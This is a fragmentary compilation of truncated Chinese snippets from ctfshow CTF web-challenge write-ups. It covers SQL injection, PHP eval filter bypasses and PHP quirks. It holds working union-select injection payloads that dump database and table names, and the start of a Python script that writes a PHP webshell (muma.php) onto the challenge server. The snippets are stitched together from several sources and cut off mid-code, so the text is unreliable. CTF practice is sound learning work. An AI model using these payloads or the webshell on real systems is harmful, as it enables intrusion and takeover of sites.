由上可知:回显位为2所在位置 爆库:admin' or 1=1 union select 1,database(),3#可知数据库名为web2 爆表:admin' or '1'='1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#可知表名为flag,user 爆字段:admin' or '1'='1' union s...
2、函数嵌套 以web31 为例 error_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i",$c)){eval($c); } }else{highlight_file(__FILE__); } 这关可以使用数组拼接的方式,或者替代函数、替代命令方式,但有人从 PHP代码 ...
最多爆破 16 次,我试了十几次,运气不行 web102 highlight_file(__FILE__);$v1=$_POST['v1'];$v2=$_GET['v2'];$v3=$_GET['v3'];$v4=is_numeric($v2) andis_numeric($v3);if($v4){$s=substr($v2,2);$str=call_user_func($v1,$s);echo$str;file_put_contents($v3,$str); }e...
web99:PHP 特性之in_array()。 web100:PHP 特性之赋值运算【=】优先级。 web101:PHP 特性之赋值运算【=】优先级,ReflectionClass($class)建立反射类。 web102:PHP 特性之赋值运算【=】优先级,is_numeric()特性,call_user_func()与hex2bin()利用,PHP 伪协议。 web103:与 web102 没什么区别。 web104:PHP ...
web29 1error_reporting(0);2if(isset($_GET['c'])){3$c=$_GET['c'];4if(!preg_match("/flag/i",$c)){5eval($c);6}78}else{9highlight_file(__FILE__);10} 涉及知识点 1、执行外部命令函数:system()、passthru()、popen()、proc_open()、exec()、shell_exec()、内敛执行(反引号``...
ctfshow_web入门 命令执行(全)——学习 命令执行 刚刚开始学习命令执行,萌新一个 因为是学习嘛,所以东西写的杂乱了 web 29 AI检测代码解析 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){...
web11 考察点:域名解析查询 题目提示“域名也可隐藏信息”,考虑通过DNS检查查询域名隐藏的信息。 两种方法: 在线网站https://zijian.aliyun.com/ 命令nslookup -query=any flag.ctfshow.com -query=any 表示查询全部基本格式信息 flag{just_seesee} web12 ...
第四步我们开始爆数据库web2里面的表名: sql 1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'# 这里我们爆出两个表名:flag和user 这里我们就可以知道我们要的flag应该是在flag表中: ...
方法一:使用下面的脚本。这个脚本适用于 web82~web86。 importrequestsimportioimportthreading url='http://b04c7980-d374-4c39-9ebc-a612708262c8.challenge.ctf.show/'sessionid='ctfshow'data={"1":"file_put_contents('/var/www/html/muma.php','<?php eval($_POST[a]);?>');"}''' ...
1.跟web100相似,v2为切入点,由于过滤了很多符号,所以命令执行和var_dump()用不了 2.通过ReflectionClass('ctfshow');映射出类ctfshow; v2=new\\ Reflectionclass&v3=; payload:?v1=1&v2=echonewReflectionclass&v3=; web102: highlight_file(__FILE__);$v1=$_POST['v1'];$v2=$_GET['v2'];$v3=$...